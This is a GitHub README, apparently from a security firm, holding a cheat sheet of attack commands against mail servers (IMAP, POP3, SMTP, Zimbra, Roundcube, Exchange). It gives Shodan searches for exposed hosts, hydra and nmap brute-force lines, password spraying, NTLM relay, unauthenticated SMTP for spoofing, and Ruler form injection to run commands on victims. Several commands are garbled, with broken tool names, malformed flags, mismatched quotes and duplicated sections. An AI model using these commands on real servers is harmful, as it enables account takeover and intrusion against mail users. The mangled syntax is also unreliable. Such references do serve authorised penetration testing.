Skip to content

A cheat sheet that contains common enumeration and attack methods for Mail Server.

Notifications You must be signed in to change notification settings

HadessCS/Mail-Server-Attacks-Cheat-Sheet

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

14 Commits
 
 
 
 

Repository files navigation

Mail-Server-Attacks-Cheat-Sheet

A cheat sheet that contains common enumeration and attack methods for Mail Server.

Mail Attacks

Brought to you by:

HADESS

HADESS performs offensive cybersecurity services through infrastructures and software that include vulnerability analysis, scenario attack planning, and implementation of custom integrated preventive projects. We organized our activities around the prevention of corporate, industrial, and laboratory cyber threats.

IMAP

Information Gathering

  nmap [-sS] [-sC] -Pn -p 143,993 -sV --script=banner [IP]
  nc -nv <IP> 993 [IP]
  shodan search "port:143"

Attacks

NTLM Auth

   telnet example.com 143
   a1 AUTHENTICATE NTLM 
   nmap --script=imap-ntlm-info [IP]

Bruteforce

   hydra -l USERNAME -P passwords.txt -f [IP] imap -V
   hydra -S -v -l USERNAME -P passwords.txt -s 993 -f [IP] imap -V
   nmap -sV --script imap-brute -p [PORT] [IP]

POP3

Information Gathering

  nmap [-sS] [-sC] -Pn -p 110,995 -sV --script=banner [IP]
  nc -nv <IP> 110 [IP]
  shodan search "port:995"

Attacks

NTLM Auth

   nmap --script "pop3-capabilities or pop3-ntlm-info" -sV -port [PORT] [IP]
   a1 AUTHENTICATE NTLM 

Bruteforce

   nmap -p110 --script pop3-brute <target>
   hydra -l muts -P pass.txt [IP] pop3

SMTP

Information Gathering

  nmap [-sS] [-sC] -Pn -p 25,465,587 -sV --script=banner or --script smtp-commands [IP]
  nc -nv <IP> 25 [IP]
nc -nv <IP> 465 [IP]
nc -nv <IP> 587 [IP]
  shodan search "port:25"
shodan search "port:465"
shodan search "port:587"

Attacks

NTLM Auth

telnet example.com 587 
HELO
AUTH NTLM 334 
   a1 AUTHENTICATE NTLM 

Bruteforce

   nmap -p[25,465,587] --script smtp-brute <target>
   hydra -l muts -P pass.txt [IP] smtp

Spoofing

   emkei.cz

Non Auth

telnet [IP] [25 or 465 or 587]
MAIL FROM: [email protected]
RCPT TO: [email protected]
SUBJECT: Test message
.

Zimbra

Information Gathering

  shodan search "8.8.6_GA_1906"
  shodan search "zimbra"

Attacks

Misconfiguration

   modules/auxiliary/gather/memcached_extractor

Anti-Malware

evilmacro
macropack
...

ActiveSync(LDAP)

   LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)

ActiveSync(SMB Share)

   peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'

Phishing

   gophish

Known Vuln

CVE‑2022‑37042
CVE‑2022‑37041
CVE‑2022‑37044

Spray

   POST

Roundcube

Information Gathering

  shodan search "http.title:'Roundcube Webmail :: Welcome to Roundcube Webmail'"
  shodan search "http.favicon.hash:976235259"

Attacks

Anti-Malware

evilmacro
macropack
...

ActiveSync(LDAP)

   LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)

ActiveSync(SMB Share)

   peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'

Phishing

   gophish

Known Vuln

   2021-44026

Spray

   POST

Microsoft Exchange

Information Gathering

shodan search "'X-AspNet-Version http.title:'Outlook' –'x-owa-version'"
shodan search "http.favicon.hash:44274939"
shodan search "http.title:outlook exchange"

Attacks

AutotDiscover

   autodiscover/autodiscover.xml

Known Vuln

ProxyLogon(2021-26855)
ProxyShell(2021-34473)
HAFNIUM(2021-26858)

Spray

Invoke-PasswordSprayOWA
Invoke-PasswordSprayEWS

NTLM Auth

   nmap --script http-ntlm-info

NTLMRelay

reponder
./exchangeRelayx.py -t https://mail.evil.com

GAL

Get-GlobalAddressList -ExchHostname mail.domain.com -UserName
domain\username -Password password -OutFile global-address-list.txt

Exchange Admin Group Deligation

Bloodhound
net

Rule

   GUI
   Ruler

Forms

   ./ruler --email [email protected] form add --suffix superduper --input command.txt --send

Anti-Malware

evilmacro
macropack
...

ActiveSync(LDAP)

   LDAPPER. py -D EVIL -U 'Administrator' -P ‘password’ -S DC02.EVIL.DEV
' (msExchDeviceID=123456)

ActiveSync(SMB Share)

   peas - u ' EVIL.DEV\sh' -p '[password]' mail.evil.dev --list-unc'\\DC01\'

ActiveSync(WSS)

   peas -U ' EVIL.DEC\user’ -p ‘password’ exch01.evil.dev - -smb-user=‘EVIL\sharepoint-setup'
• - smb-pass=' password’ •-list-unc 'http://SHP01/share’

RPC

   nmap mail.evil.dev -p 6001 -sV - sC
 rpcmap . py -debug -auth-transport’EVIL/user:password’
'ncacn http: /6001,RpcProxy=mail.evil.dev: 443]'
 rpcmap.py -debug -auth-transport 'EVIL/user:password' -auth-rpc 'EVIL/mia:password' -auth-level 6 -brute-opnums 'ncacn_http:[6001,RpcProxy=mail.evil.dev:443]'

LDAP

 LDAPPER. py -D EVIL - U 'Administrator' -P ‘password’ -S DC01. EVIL.DEV
([email protected]) mail objectGUID legacyExchangeDN distinguishedName
exchanger. py EVIL/user: ‘password’@mail.evil.dev nspi
dump -tables -name Hackers -lookup-tvpe EXTENDED

Phishing

   gophish

About

A cheat sheet that contains common enumeration and attack methods for Mail Server.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published